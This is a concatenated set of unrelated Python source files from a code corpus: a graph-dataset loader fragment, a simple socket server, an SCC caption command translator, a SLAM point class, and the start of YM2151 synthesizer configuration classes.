for i, (n1, n2, edata) in enumerate(sorted(g.edges(data=True))):
BiGNNDataset.assert_valid_nid(n1, g)
BiGNNDataset.assert_valid_nid(n2, g)
remove_entries_from_dict(edata, eatts)
graphs[gid] = Graph(g)
print("total graphs with edges: {}\nnon connected graphs: {}"
.format(len(graphs), len(not_connected)))
print("not connected ids: ", not_connected)
print("num no edges: ", len(no_edges), "\nno edges ids: ", no_edges)
if not graphs:
raise ValueError('Loaded 0 graphs from {}\n'
'Please download the gexf-formated dataset'
' from Google Drive and extract under:\n{}'.
format(dir, get_data_path()))
return graphs
def remove_entries_from_dict(d, keeps):
for k in set(d) - set(keeps):
del d[k]
def add_graph_data_to_nxgraph(g, graph_data):
if graph_data:
for k,v in graph_data.items():
g.graph[k] = v
| 2.25
| 2
|
very_scratch/server/example5/websocketserver.py
|
ibrahemesam/Fos
| 3
|
12783899
|
#!/usr/bin/env python
import socket
import threading
import config
import websocketclient
class WebSocketServer:
"""
Handle the Server, bind and accept new connections, open and close
clients connections.
"""
def __init__(self):
        self.clients = []
        # One lock shared by all client threads that mutate self.clients
        self.clients_lock = threading.Lock()
def start(self):
"""
Start the server.
"""
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', config.socketport))
s.listen(1)
try:
while 1:
conn, addr = s.accept()
print('Connected by', addr)
newClient = websocketclient.WebSocketClient(conn, addr, self)
self.clients.append(newClient)
newClient.start()
except KeyboardInterrupt:
[client.close() for client in self.clients]
s.close()
def send_all(self, data):
"""
Send a message to all the currenly connected clients.
"""
[client.send(data) for client in self.clients]
def remove(self, client):
"""
Remove a client from the connected list.
"""
        # A new Lock per call gives no mutual exclusion; use the lock shared across threads
        with self.clients_lock:
            self.clients.remove(client)
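# Illustrative usage (assumes config.socketport is defined and websocketclient is importable):
#   server = WebSocketServer()
#   server.start()   # blocks, accepting clients until KeyboardInterrupt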
| 3.03125
| 3
|
pycaption/scc/translator.py
|
vpaul-dev/pycaption-github-release-notes
| 183
|
12783900
|
from pycaption.scc.constants import CHARACTERS, SPECIAL_CHARS, EXTENDED_CHARS
ALL_CHARACTERS = {**CHARACTERS, **SPECIAL_CHARS, **EXTENDED_CHARS}
COMMAND_LABELS = {
"9420": "Resume Caption Loading",
"9429": "Resume Direct Captioning",
"9425": "Roll-Up Captions--2 Rows",
"9426": "Roll-Up Captions--3 Rows",
"94a7": "Roll-Up Captions--4 Rows",
"942a": "Text Restart",
"94ab": "Resume Text Display",
"942c": "Erase Displayed Memory",
"94ae": "Erase Non-displayed Memory",
"942f": "End Of Caption",
"9140": "row 01, column 00, with plain white text.",
"91c1": "row 01, column 00, with white underlined text.",
"91c2": "row 01, column 00, with plain green text.",
"9143": "row 01, column 00, with green underlined text.",
"91c4": "row 01, column 00, with plain blue text.",
"9145": "row 01, column 00, with blue underlined text.",
"9146": "row 01, column 00, with plain cyan text.",
"91c7": "row 01, column 00, with cyan underlined text.",
"91c8": "row 01, column 00, with plain red text.",
"9149": "row 01, column 00, with red underlined text.",
"914a": "row 01, column 00, with plain yellow text.",
"91cb": "row 01, column 00, with yellow underlined text.",
"914c": "row 01, column 00, with plain magenta text.",
"91cd": "row 01, column 00, with magenta underlined text.",
"91ce": "row 01, column 00, with white italicized text.",
"914f": "row 01, column 00, with white underlined italicized text.",
"91d0": "row 01, column 00, with plain white text.",
"9151": "row 01, column 00, with white underlined text.",
"9152": "row 01, column 04, with plain white text.",
"91d3": "row 01, column 04, with white underlined text.",
"9154": "row 01, column 08, with plain white text.",
"91d5": "row 01, column 08, with white underlined text.",
"91d6": "row 01, column 12, with plain white text.",
"9157": "row 01, column 12, with white underlined text.",
"9158": "row 01, column 16, with plain white text.",
"91d9": "row 01, column 16, with white underlined text.",
"91da": "row 01, column 20, with plain white text.",
"915b": "row 01, column 20, with white underlined text.",
"91dc": "row 01, column 24, with plain white text.",
"915d": "row 01, column 24, with white underlined text.",
"915e": "row 01, column 28, with plain white text.",
"91df": "row 01, column 28, with white underlined text.",
"91e0": "row 02, column 00, with plain white text.",
"9161": "row 02, column 00, with white underlined text.",
"9162": "row 02, column 00, with plain green text.",
"91e3": "row 02, column 00, with green underlined text.",
"9164": "row 02, column 00, with plain blue text.",
"91e5": "row 02, column 00, with blue underlined text.",
"91e6": "row 02, column 00, with plain cyan text.",
"9167": "row 02, column 00, with cyan underlined text.",
"9168": "row 02, column 00, with plain red text.",
"91e9": "row 02, column 00, with red underlined text.",
"91ea": "row 02, column 00, with plain yellow text.",
"916b": "row 02, column 00, with yellow underlined text.",
"91ec": "row 02, column 00, with plain magenta text.",
"916d": "row 02, column 00, with magenta underlined text.",
"916e": "row 02, column 00, with white italicized text.",
"91ef": "row 02, column 00, with white underlined italicized text.",
"9170": "row 02, column 00, with plain white text.",
"91f1": "row 02, column 00, with white underlined text.",
"91f2": "row 02, column 04, with plain white text.",
"9173": "row 02, column 04, with white underlined text.",
"91f4": "row 02, column 08, with plain white text.",
"9175": "row 02, column 08, with white underlined text.",
"9176": "row 02, column 12, with plain white text.",
"91f7": "row 02, column 12, with white underlined text.",
"91f8": "row 02, column 16, with plain white text.",
"9179": "row 02, column 16, with white underlined text.",
"917a": "row 02, column 20, with plain white text.",
"91fb": "row 02, column 20, with white underlined text.",
"91fc": "row 02, column 24, with plain white text.",
"91fd": "row 02, column 24, with white underlined text.",
"91fe": "row 02, column 28, with plain white text.",
"917f": "row 02, column 28, with white underlined text.",
"9240": "row 03, column 00, with plain white text.",
"92c1": "row 03, column 00, with white underlined text.",
"92c2": "row 03, column 00, with plain green text.",
"9243": "row 03, column 00, with green underlined text.",
"92c4": "row 03, column 00, with plain blue text.",
"9245": "row 03, column 00, with blue underlined text.",
"9246": "row 03, column 00, with plain cyan text.",
"92c7": "row 03, column 00, with cyan underlined text.",
"92c8": "row 03, column 00, with plain red text.",
"9249": "row 03, column 00, with red underlined text.",
"924a": "row 03, column 00, with plain yellow text.",
"92cb": "row 03, column 00, with yellow underlined text.",
"924c": "row 03, column 00, with plain magenta text.",
"92cd": "row 03, column 00, with magenta underlined text.",
"92ce": "row 03, column 00, with white italicized text.",
"924f": "row 03, column 00, with white underlined italicized text.",
"92d0": "row 03, column 00, with plain white text.",
"9251": "row 03, column 00, with white underlined text.",
"9252": "row 03, column 04, with plain white text.",
"92d3": "row 03, column 04, with white underlined text.",
"9254": "row 03, column 08, with plain white text.",
"92d5": "row 03, column 08, with white underlined text.",
"92d6": "row 03, column 12, with plain white text.",
"9257": "row 03, column 12, with white underlined text.",
"9258": "row 03, column 16, with plain white text.",
"92d9": "row 03, column 16, with white underlined text.",
"92da": "row 03, column 20, with plain white text.",
"925b": "row 03, column 20, with white underlined text.",
"92dc": "row 03, column 24, with plain white text.",
"925d": "row 03, column 24, with white underlined text.",
"925e": "row 03, column 28, with plain white text.",
"92df": "row 03, column 28, with white underlined text.",
"92e0": "row 04, column 00, with plain white text.",
"9261": "row 04, column 00, with white underlined text.",
"9262": "row 04, column 00, with plain green text.",
"92e3": "row 04, column 00, with green underlined text.",
"9264": "row 04, column 00, with plain blue text.",
"92e5": "row 04, column 00, with blue underlined text.",
"92e6": "row 04, column 00, with plain cyan text.",
"9267": "row 04, column 00, with cyan underlined text.",
"9268": "row 04, column 00, with plain red text.",
"92e9": "row 04, column 00, with red underlined text.",
"92ea": "row 04, column 00, with plain yellow text.",
"926b": "row 04, column 00, with yellow underlined text.",
"92ec": "row 04, column 00, with plain magenta text.",
"926d": "row 04, column 00, with magenta underlined text.",
"926e": "row 04, column 00, with white italicized text.",
"92ef": "row 04, column 00, with white underlined italicized text.",
"9270": "row 04, column 00, with plain white text.",
"92f1": "row 04, column 00, with white underlined text.",
"92f2": "row 04, column 04, with plain white text.",
"9273": "row 04, column 04, with white underlined text.",
"92f4": "row 04, column 08, with plain white text.",
"9275": "row 04, column 08, with white underlined text.",
"9276": "row 04, column 12, with plain white text.",
"92f7": "row 04, column 12, with white underlined text.",
"92f8": "row 04, column 16, with plain white text.",
"9279": "row 04, column 16, with white underlined text.",
"927a": "row 04, column 20, with plain white text.",
"92fb": "row 04, column 20, with white underlined text.",
"92fc": "row 04, column 24, with plain white text.",
"92fd": "row 04, column 24, with white underlined text.",
"92fe": "row 04, column 28, with plain white text.",
"927f": "row 04, column 28, with white underlined text.",
"1540": "row 05, column 00, with plain white text.",
"15c1": "row 05, column 00, with white underlined text.",
"15c2": "row 05, column 00, with plain green text.",
"1543": "row 05, column 00, with green underlined text.",
"15c4": "row 05, column 00, with plain blue text.",
"1545": "row 05, column 00, with blue underlined text.",
"1546": "row 05, column 00, with plain cyan text.",
"15c7": "row 05, column 00, with cyan underlined text.",
"15c8": "row 05, column 00, with plain red text.",
"1549": "row 05, column 00, with red underlined text.",
"154a": "row 05, column 00, with plain yellow text.",
"15cb": "row 05, column 00, with yellow underlined text.",
"154c": "row 05, column 00, with plain magenta text.",
"15cd": "row 05, column 00, with magenta underlined text.",
"15ce": "row 05, column 00, with white italicized text.",
"154f": "row 05, column 00, with white underlined italicized text.",
"15d0": "row 05, column 00, with plain white text.",
"1551": "row 05, column 00, with white underlined text.",
"1552": "row 05, column 04, with plain white text.",
"15d3": "row 05, column 04, with white underlined text.",
"1554": "row 05, column 08, with plain white text.",
"15d5": "row 05, column 08, with white underlined text.",
"15d6": "row 05, column 12, with plain white text.",
"1557": "row 05, column 12, with white underlined text.",
"1558": "row 05, column 16, with plain white text.",
"15d9": "row 05, column 16, with white underlined text.",
"15da": "row 05, column 20, with plain white text.",
"155b": "row 05, column 20, with white underlined text.",
"15dc": "row 05, column 24, with plain white text.",
"155d": "row 05, column 24, with white underlined text.",
"155e": "row 05, column 28, with plain white text.",
"15df": "row 05, column 28, with white underlined text.",
"15e0": "row 06, column 00, with plain white text.",
"1561": "row 06, column 00, with white underlined text.",
"15462": "row 06, column 00, with plain green text.",
"15e3": "row 06, column 00, with green underlined text.",
"1564": "row 06, column 00, with plain blue text.",
"15e5": "row 06, column 00, with blue underlined text.",
"15e6": "row 06, column 00, with plain cyan text.",
"1567": "row 06, column 00, with cyan underlined text.",
"1568": "row 06, column 00, with plain red text.",
"15e9": "row 06, column 00, with red underlined text.",
"15ea": "row 06, column 00, with plain yellow text.",
"156b": "row 06, column 00, with yellow underlined text.",
"15ec": "row 06, column 00, with plain magenta text.",
"156d": "row 06, column 00, with magenta underlined text.",
"156e": "row 06, column 00, with white italicized text.",
"15ef": "row 06, column 00, with white underlined italicized text.",
"1570": "row 06, column 00, with plain white text.",
"15f1": "row 06, column 00, with white underlined text.",
"15f2": "row 06, column 04, with plain white text.",
"1573": "row 06, column 04, with white underlined text.",
"15f4": "row 06, column 08, with plain white text.",
"1575": "row 06, column 08, with white underlined text.",
"1576": "row 06, column 12, with plain white text.",
"15f7": "row 06, column 12, with white underlined text.",
"15f8": "row 06, column 16, with plain white text.",
"1579": "row 06, column 16, with white underlined text.",
"157a": "row 06, column 20, with plain white text.",
"15fb": "row 06, column 20, with white underlined text.",
"15fc": "row 06, column 24, with plain white text.",
"15fd": "row 06, column 24, with white underlined text.",
"15fe": "row 06, column 28, with plain white text.",
"157f": "row 06, column 28, with white underlined text.",
"1640": "row 07, column 00, with plain white text.",
"16c1": "row 07, column 00, with white underlined text.",
"16c2": "row 07, column 00, with plain green text.",
"1643": "row 07, column 00, with green underlined text.",
"16c4": "row 07, column 00, with plain blue text.",
"1645": "row 07, column 00, with blue underlined text.",
"1646": "row 07, column 00, with plain cyan text.",
"16c7": "row 07, column 00, with cyan underlined text.",
"16c8": "row 07, column 00, with plain red text.",
"1649": "row 07, column 00, with red underlined text.",
"164a": "row 07, column 00, with plain yellow text.",
"16cb": "row 07, column 00, with yellow underlined text.",
"164c": "row 07, column 00, with plain magenta text.",
"16cd": "row 07, column 00, with magenta underlined text.",
"16ce": "row 07, column 00, with white italicized text.",
"164f": "row 07, column 00, with white underlined italicized text.",
"16d0": "row 07, column 00, with plain white text.",
"1651": "row 07, column 00, with white underlined text.",
"1652": "row 07, column 04, with plain white text.",
"16d3": "row 07, column 04, with white underlined text.",
"1654": "row 07, column 08, with plain white text.",
"16d5": "row 07, column 08, with white underlined text.",
"16d6": "row 07, column 12, with plain white text.",
"1657": "row 07, column 12, with white underlined text.",
"1658": "row 07, column 16, with plain white text.",
"16d9": "row 07, column 16, with white underlined text.",
"16da": "row 07, column 20, with plain white text.",
"165b": "row 07, column 20, with white underlined text.",
"16dc": "row 07, column 24, with plain white text.",
"165d": "row 07, column 24, with white underlined text.",
"165e": "row 07, column 28, with plain white text.",
"16df": "row 07, column 28, with white underlined text.",
"16e0": "row 08, column 00, with plain white text.",
"1661": "row 08, column 00, with white underlined text.",
"16462": "row 08, column 00, with plain green text.",
"16e3": "row 08, column 00, with green underlined text.",
"1664": "row 08, column 00, with plain blue text.",
"16e5": "row 08, column 00, with blue underlined text.",
"16e6": "row 08, column 00, with plain cyan text.",
"1667": "row 08, column 00, with cyan underlined text.",
"1668": "row 08, column 00, with plain red text.",
"16e9": "row 08, column 00, with red underlined text.",
"16ea": "row 08, column 00, with plain yellow text.",
"166b": "row 08, column 00, with yellow underlined text.",
"16ec": "row 08, column 00, with plain magenta text.",
"166d": "row 08, column 00, with magenta underlined text.",
"166e": "row 08, column 00, with white italicized text.",
"16ef": "row 08, column 00, with white underlined italicized text.",
"1670": "row 08, column 00, with plain white text.",
"16f1": "row 08, column 00, with white underlined text.",
"16f2": "row 08, column 04, with plain white text.",
"1673": "row 08, column 04, with white underlined text.",
"16f4": "row 08, column 08, with plain white text.",
"1675": "row 08, column 08, with white underlined text.",
"1676": "row 08, column 12, with plain white text.",
"16f7": "row 08, column 12, with white underlined text.",
"16f8": "row 08, column 16, with plain white text.",
"1679": "row 08, column 16, with white underlined text.",
"167a": "row 08, column 20, with plain white text.",
"16fb": "row 08, column 20, with white underlined text.",
"16fc": "row 08, column 24, with plain white text.",
"16fd": "row 08, column 24, with white underlined text.",
"16fe": "row 08, column 28, with plain white text.",
"167f": "row 08, column 28, with white underlined text.",
"9740": "row 09, column 00, with plain white text.",
"97c1": "row 09, column 00, with white underlined text.",
"97c2": "row 09, column 00, with plain green text.",
"9743": "row 09, column 00, with green underlined text.",
"97c4": "row 09, column 00, with plain blue text.",
"9745": "row 09, column 00, with blue underlined text.",
"9746": "row 09, column 00, with plain cyan text.",
"97c7": "row 09, column 00, with cyan underlined text.",
"97c8": "row 09, column 00, with plain red text.",
"9749": "row 09, column 00, with red underlined text.",
"974a": "row 09, column 00, with plain yellow text.",
"97cb": "row 09, column 00, with yellow underlined text.",
"974c": "row 09, column 00, with plain magenta text.",
"97cd": "row 09, column 00, with magenta underlined text.",
"97ce": "row 09, column 00, with white italicized text.",
"974f": "row 09, column 00, with white underlined italicized text.",
"97d0": "row 09, column 00, with plain white text.",
"9751": "row 09, column 00, with white underlined text.",
"9752": "row 09, column 04, with plain white text.",
"97d3": "row 09, column 04, with white underlined text.",
"9754": "row 09, column 08, with plain white text.",
"97d5": "row 09, column 08, with white underlined text.",
"97d6": "row 09, column 12, with plain white text.",
"9757": "row 09, column 12, with white underlined text.",
"9758": "row 09, column 16, with plain white text.",
"97d9": "row 09, column 16, with white underlined text.",
"97da": "row 09, column 20, with plain white text.",
"975b": "row 09, column 20, with white underlined text.",
"97dc": "row 09, column 24, with plain white text.",
"975d": "row 09, column 24, with white underlined text.",
"975e": "row 09, column 28, with plain white text.",
"97df": "row 09, column 28, with white underlined text.",
"97e0": "row 10, column 00, with plain white text.",
"9761": "row 10, column 00, with white underlined text.",
"9762": "row 10, column 00, with plain green text.",
"97e3": "row 10, column 00, with green underlined text.",
"9764": "row 10, column 00, with plain blue text.",
"97e5": "row 10, column 00, with blue underlined text.",
"97e6": "row 10, column 00, with plain cyan text.",
"9767": "row 10, column 00, with cyan underlined text.",
"9768": "row 10, column 00, with plain red text.",
"97e9": "row 10, column 00, with red underlined text.",
"97ea": "row 10, column 00, with plain yellow text.",
"976b": "row 10, column 00, with yellow underlined text.",
"97ec": "row 10, column 00, with plain magenta text.",
"976d": "row 10, column 00, with magenta underlined text.",
"976e": "row 10, column 00, with white italicized text.",
"97ef": "row 10, column 00, with white underlined italicized text.",
"9770": "row 10, column 00, with plain white text.",
"97f1": "row 10, column 00, with white underlined text.",
"97f2": "row 10, column 04, with plain white text.",
"9773": "row 10, column 04, with white underlined text.",
"97f4": "row 10, column 08, with plain white text.",
"9775": "row 10, column 08, with white underlined text.",
"9776": "row 10, column 12, with plain white text.",
"97f7": "row 10, column 12, with white underlined text.",
"97f8": "row 10, column 16, with plain white text.",
"9779": "row 10, column 16, with white underlined text.",
"977a": "row 10, column 20, with plain white text.",
"97fb": "row 10, column 20, with white underlined text.",
"97fc": "row 10, column 24, with plain white text.",
"97fd": "row 10, column 24, with white underlined text.",
"97fe": "row 10, column 28, with plain white text.",
"977f": "row 10, column 28, with white underlined text.",
"1040": "row 11, column 00, with plain white text.",
"10c1": "row 11, column 00, with white underlined text.",
"10c2": "row 11, column 00, with plain green text.",
"1043": "row 11, column 00, with green underlined text.",
"10c4": "row 11, column 00, with plain blue text.",
"1045": "row 11, column 00, with blue underlined text.",
"1046": "row 11, column 00, with plain cyan text.",
"10c7": "row 11, column 00, with cyan underlined text.",
"10c8": "row 11, column 00, with plain red text.",
"1049": "row 11, column 00, with red underlined text.",
"104a": "row 11, column 00, with plain yellow text.",
"10cb": "row 11, column 00, with yellow underlined text.",
"104c": "row 11, column 00, with plain magenta text.",
"10cd": "row 11, column 00, with magenta underlined text.",
"10ce": "row 11, column 00, with white italicized text.",
"104f": "row 11, column 00, with white underlined italicized text.",
"10d0": "row 11, column 00, with plain white text.",
"1051": "row 11, column 00, with white underlined text.",
"1052": "row 11, column 04, with plain white text.",
"10d3": "row 11, column 04, with white underlined text.",
"1054": "row 11, column 08, with plain white text.",
"10d5": "row 11, column 08, with white underlined text.",
"10d6": "row 11, column 12, with plain white text.",
"1057": "row 11, column 12, with white underlined text.",
"1058": "row 11, column 16, with plain white text.",
"10d9": "row 11, column 16, with white underlined text.",
"10da": "row 11, column 20, with plain white text.",
"105b": "row 11, column 20, with white underlined text.",
"10dc": "row 11, column 24, with plain white text.",
"105d": "row 11, column 24, with white underlined text.",
"105e": "row 11, column 28, with plain white text.",
"10df": "row 11, column 28, with white underlined text.",
"1340": "row 12, column 00, with plain white text.",
"13c1": "row 12, column 00, with white underlined text.",
"13c2": "row 12, column 00, with plain green text.",
"1343": "row 12, column 00, with green underlined text.",
"13c4": "row 12, column 00, with plain blue text.",
"1345": "row 12, column 00, with blue underlined text.",
"1346": "row 12, column 00, with plain cyan text.",
"13c7": "row 12, column 00, with cyan underlined text.",
"13c8": "row 12, column 00, with plain red text.",
"1349": "row 12, column 00, with red underlined text.",
"134a": "row 12, column 00, with plain yellow text.",
"13cb": "row 12, column 00, with yellow underlined text.",
"134c": "row 12, column 00, with plain magenta text.",
"13cd": "row 12, column 00, with magenta underlined text.",
"13ce": "row 12, column 00, with white italicized text.",
"134f": "row 12, column 00, with white underlined italicized text.",
"13d0": "row 12, column 00, with plain white text.",
"1351": "row 12, column 00, with white underlined text.",
"1352": "row 12, column 04, with plain white text.",
"13d3": "row 12, column 04, with white underlined text.",
"1354": "row 12, column 08, with plain white text.",
"13d5": "row 12, column 08, with white underlined text.",
"13d6": "row 12, column 12, with plain white text.",
"1357": "row 12, column 12, with white underlined text.",
"1358": "row 12, column 16, with plain white text.",
"13d9": "row 12, column 16, with white underlined text.",
"13da": "row 12, column 20, with plain white text.",
"135b": "row 12, column 20, with white underlined text.",
"13dc": "row 12, column 24, with plain white text.",
"135d": "row 12, column 24, with white underlined text.",
"135e": "row 12, column 28, with plain white text.",
"13df": "row 12, column 28, with white underlined text.",
"13e0": "row 13, column 00, with plain white text.",
"1361": "row 13, column 00, with white underlined text.",
"13462": "row 13, column 00, with plain green text.",
"13e3": "row 13, column 00, with green underlined text.",
"1364": "row 13, column 00, with plain blue text.",
"13e5": "row 13, column 00, with blue underlined text.",
"13e6": "row 13, column 00, with plain cyan text.",
"1367": "row 13, column 00, with cyan underlined text.",
"1368": "row 13, column 00, with plain red text.",
"13e9": "row 13, column 00, with red underlined text.",
"13ea": "row 13, column 00, with plain yellow text.",
"136b": "row 13, column 00, with yellow underlined text.",
"13ec": "row 13, column 00, with plain magenta text.",
"136d": "row 13, column 00, with magenta underlined text.",
"136e": "row 13, column 00, with white italicized text.",
"13ef": "row 13, column 00, with white underlined italicized text.",
"1370": "row 13, column 00, with plain white text.",
"13f1": "row 13, column 00, with white underlined text.",
"13f2": "row 13, column 04, with plain white text.",
"1373": "row 13, column 04, with white underlined text.",
"13f4": "row 13, column 08, with plain white text.",
"1375": "row 13, column 08, with white underlined text.",
"1376": "row 13, column 12, with plain white text.",
"13f7": "row 13, column 12, with white underlined text.",
"13f8": "row 13, column 16, with plain white text.",
"1379": "row 13, column 16, with white underlined text.",
"137a": "row 13, column 20, with plain white text.",
"13fb": "row 13, column 20, with white underlined text.",
"13fc": "row 13, column 24, with plain white text.",
"13fd": "row 13, column 24, with white underlined text.",
"13fe": "row 13, column 28, with plain white text.",
"137f": "row 13, column 28, with white underlined text.",
"9440": "row 14, column 00, with plain white text.",
"94c1": "row 14, column 00, with white underlined text.",
"94c2": "row 14, column 00, with plain green text.",
"9443": "row 14, column 00, with green underlined text.",
"94c4": "row 14, column 00, with plain blue text.",
"9445": "row 14, column 00, with blue underlined text.",
"9446": "row 14, column 00, with plain cyan text.",
"94c7": "row 14, column 00, with cyan underlined text.",
"94c8": "row 14, column 00, with plain red text.",
"9449": "row 14, column 00, with red underlined text.",
"944a": "row 14, column 00, with plain yellow text.",
"94cb": "row 14, column 00, with yellow underlined text.",
"944c": "row 14, column 00, with plain magenta text.",
"94cd": "row 14, column 00, with magenta underlined text.",
"94ce": "row 14, column 00, with white italicized text.",
"944f": "row 14, column 00, with white underlined italicized text.",
"94d0": "row 14, column 00, with plain white text.",
"9451": "row 14, column 00, with white underlined text.",
"9452": "row 14, column 04, with plain white text.",
"94d3": "row 14, column 04, with white underlined text.",
"9454": "row 14, column 08, with plain white text.",
"94d5": "row 14, column 08, with white underlined text.",
"94d6": "row 14, column 12, with plain white text.",
"9457": "row 14, column 12, with white underlined text.",
"9458": "row 14, column 16, with plain white text.",
"94d9": "row 14, column 16, with white underlined text.",
"94da": "row 14, column 20, with plain white text.",
"945b": "row 14, column 20, with white underlined text.",
"94dc": "row 14, column 24, with plain white text.",
"945d": "row 14, column 24, with white underlined text.",
"945e": "row 14, column 28, with plain white text.",
"94df": "row 14, column 28, with white underlined text.",
"94e0": "row 15, column 00, with plain white text.",
"9461": "row 15, column 00, with white underlined text.",
"9462": "row 15, column 00, with plain green text.",
"94e3": "row 15, column 00, with green underlined text.",
"9464": "row 15, column 00, with plain blue text.",
"94e5": "row 15, column 00, with blue underlined text.",
"94e6": "row 15, column 00, with plain cyan text.",
"9467": "row 15, column 00, with cyan underlined text.",
"9468": "row 15, column 00, with plain red text.",
"94e9": "row 15, column 00, with red underlined text.",
"94ea": "row 15, column 00, with plain yellow text.",
"946b": "row 15, column 00, with yellow underlined text.",
"94ec": "row 15, column 00, with plain magenta text.",
"946d": "row 15, column 00, with magenta underlined text.",
"946e": "row 15, column 00, with white italicized text.",
"94ef": "row 15, column 00, with white underlined italicized text.",
"9470": "row 15, column 00, with plain white text.",
"94f1": "row 15, column 00, with white underlined text.",
"94f2": "row 15, column 04, with plain white text.",
"9473": "row 15, column 04, with white underlined text.",
"94f4": "row 15, column 08, with plain white text.",
"9475": "row 15, column 08, with white underlined text.",
"9476": "row 15, column 12, with plain white text.",
"94f7": "row 15, column 12, with white underlined text.",
"94f8": "row 15, column 16, with plain white text.",
"9479": "row 15, column 16, with white underlined text.",
"947a": "row 15, column 20, with plain white text.",
"94fb": "row 15, column 20, with white underlined text.",
"94fc": "row 15, column 24, with plain white text.",
"94fd": "row 15, column 24, with white underlined text.",
"94fe": "row 15, column 28, with plain white text.",
"947f": "row 15, column 28, with white underlined text.",
"97a1": "Tab Offset 1 column",
"97a2": "Tab Offset 2 columns",
"9723": "Tab Offset 3 columns",
"94a1": "BackSpace",
"94a4": "Delete to End of Row",
"94ad": "Carriage Return",
"1020": "Background White",
"10a1": "Background Semi-Transparent White",
"10a2": "Background Green",
"1023": "Background Semi-Transparent Green",
"10a4": "Background Blue",
"1025": "Background Semi-Transparent Blue",
"1026": "Background Cyan",
"10a7": "Background Semi-Transparent Cyan",
"10a8": "Background Red",
"1029": "Background Semi-Transparent Red",
"102a": "Background Yellow",
"10ab": "Background Semi-Transparent Yellow",
"102c": "Background Magenta",
"10ad": "Background Semi-Transparent Magenta",
"10ae": "Background Black",
"102f": "Background Semi-Transparent Black",
"97ad": "Background Transparent",
"97a4": "Standard Character Set",
"9725": "Double-Size Character Set",
"9726": "First Private Character Set",
"97a7": "Second Private Character Set",
"97a8": "People`s Republic of China Character Set",
"9729": "Korean Standard Character Set",
"972a": "First Registered Character Set",
"9120": "White",
"91a1": "White Underline",
"91a2": "Green",
"9123": "Green Underline",
"91a4": "Blue",
"9125": "Blue Underline",
"9126": "Cyan",
"91a7": "Cyan Underline",
"91a8": "Red",
"9129": "Red Underline",
"912a": "Yellow",
"91ab": "Yellow Underline",
"912c": "Magenta",
"91ad": "Magenta Underline",
"97ae": "Black",
"972f": "Black Underline",
"91ae": "Italics",
"912f": "Italics Underline",
"94a8": "Flash ON",
"9423": "Alarm Off",
"94a2": "Alarm On"
}
def translate_scc(scc_content, brackets='[]'):
"""
Replaces hexadecimal words with their meaning
In order to make SCC files more human readable and easier to debug,
this function is used to replace command codes with their labels and
character bytes with their actual characters
:param scc_content: SCC captions to be translated
:type scc_content: str
:param brackets: Brackets to group the translated content of a command
:type brackets: str
:return: Translated SCC captions
:rtype: str
"""
opening_bracket, closing_bracket = brackets if brackets else ('', '')
scc_elements = set(scc_content.split())
for elem in scc_elements:
name = COMMAND_LABELS.get(elem)
# If a 2 byte command was not found, try retrieving 1 byte characters
if not name:
char1 = ALL_CHARACTERS.get(elem[:2])
char2 = ALL_CHARACTERS.get(elem[2:])
if char1 is not None and char2 is not None:
name = f"{char1}{char2}"
if name:
scc_content = scc_content.replace(
elem, f"{opening_bracket}{name}{closing_bracket}")
return scc_content
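# --- Hedged usage sketch (added for illustration; not part of the original
# module). It assumes COMMAND_LABELS and ALL_CHARACTERS above are in scope and
# uses only words that appear in the tables, e.g. "9120" (White), "94ad"
# (Carriage Return) and "9723" (Tab Offset 3 columns).
if __name__ == "__main__":
    sample = "9120 94ad 9723"
    print(translate_scc(sample))
    # -> "[White] [Carriage Return] [Tab Offset 3 columns]"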
| 2.328125
| 2
|
point.py
|
akitoakihito/python_slam
| 2
|
12783901
|
import numpy as np
# class for 3D points in an image frame
class Point(object):
# class constructor
def __init__(self, img_map, location, color):
self.point = location
self.frames = []
self.idx = []
self.color = np.copy(color)
self.id = img_map.max_point
img_map.max_point += 1
img_map.points.append(self)
def orb(self):
des = []
for f in self.frames:
des.append(f.des[f.pts.index(self)])
return des
    # add a frame from the video feed, and the index of this point's
    # keypoint within that frame, to the Point object
def add_observation(self, frame, index):
frame.pts[index] = self
self.frames.append(frame)
self.idx.append(index)
    # remove this point from every frame that observes it
def delete_point(self):
for f in self.frames:
f.pts[f.pts.index(self)] = None
del self
def homogenous(self):
return np.array([self.point[0], self.point[1], self.point[2], 1.0])
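# --- Hedged usage sketch (added for illustration; not part of the original
# module). Point only needs a map-like object exposing `max_point` and
# `points`; the minimal stand-in below is an assumption, not the real map
# class used elsewhere in this project.
if __name__ == "__main__":
    class _FakeMap:
        def __init__(self):
            self.max_point = 0
            self.points = []

    img_map = _FakeMap()
    pt = Point(img_map, location=[1.0, 2.0, 3.0], color=[255, 0, 0])
    print(pt.id, pt.homogenous())  # -> 0 [1. 2. 3. 1.]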
| 2.96875
| 3
|
src/vgm/ym2151/config.py
|
cybermats/vgm_extractor
| 0
|
12783902
|
import copy
import json
from enum import Enum, IntFlag, Flag
from json import JSONEncoder
from typing import Any, List, Dict
from vgm.command import VgmCommand, VgmCommandType
class Waveform(Enum):
SAW = 0
SQUARE = 1
TRIANGLE = 2
NOISE = 3
def repr_json(self):
return self.name
class Operators(Flag):
MOD1 = 1
CAR1 = 2
MOD2 = 4
CAR2 = 8
def repr_json(self):
o = []
if self & Operators.MOD1:
o.append(Operators.MOD1.name)
if self & Operators.CAR1:
o.append(Operators.CAR1.name)
if self & Operators.MOD2:
o.append(Operators.MOD2.name)
if self & Operators.CAR2:
o.append(Operators.CAR2.name)
return "|".join(o)
class BaseConfig:
def __init__(self, other=None) -> None:
self.waveform: Waveform = Waveform.SAW if not other else other.waveform
self.lfo: int = 0 if not other else other.lfo
self.amp_md: int = 0 if not other else other.amp_md
self.phs_md: int = 0 if not other else other.phs_md
def __eq__(self, other: Any) -> bool:
if isinstance(other, BaseConfig):
return (
self.lfo == other.lfo
and self.phs_md == other.phs_md
and self.amp_md == other.amp_md
and self.waveform == other.waveform
)
return NotImplemented
# noinspection PyArgumentList
def __deepcopy__(self, _) -> object:
return BaseConfig(self)
def repr_json(self):
return self.__dict__
class OperatorConfig:
def __init__(self, other=None) -> None:
self.total_level: int = 0 if not other else other.total_level
self.attack_rate: int = 0 if not other else other.attack_rate
self.first_decay_rate: int = 0 if not other else other.first_decay_rate
self.first_decay_level: int = 0 if not other else other.first_decay_level
self.second_decay_rate: int = 0 if not other else other.second_decay_rate
self.release_rate: int = 0 if not other else other.release_rate
self.key_scale: int = 0 if not other else other.key_scale
self.multiply: int = 0 if not other else other.multiply
self.first_detune: int = 0 if not other else other.first_detune
self.second_detune: int = 0 if not other else other.second_detune
self.ase: bool = False if not other else other.ase
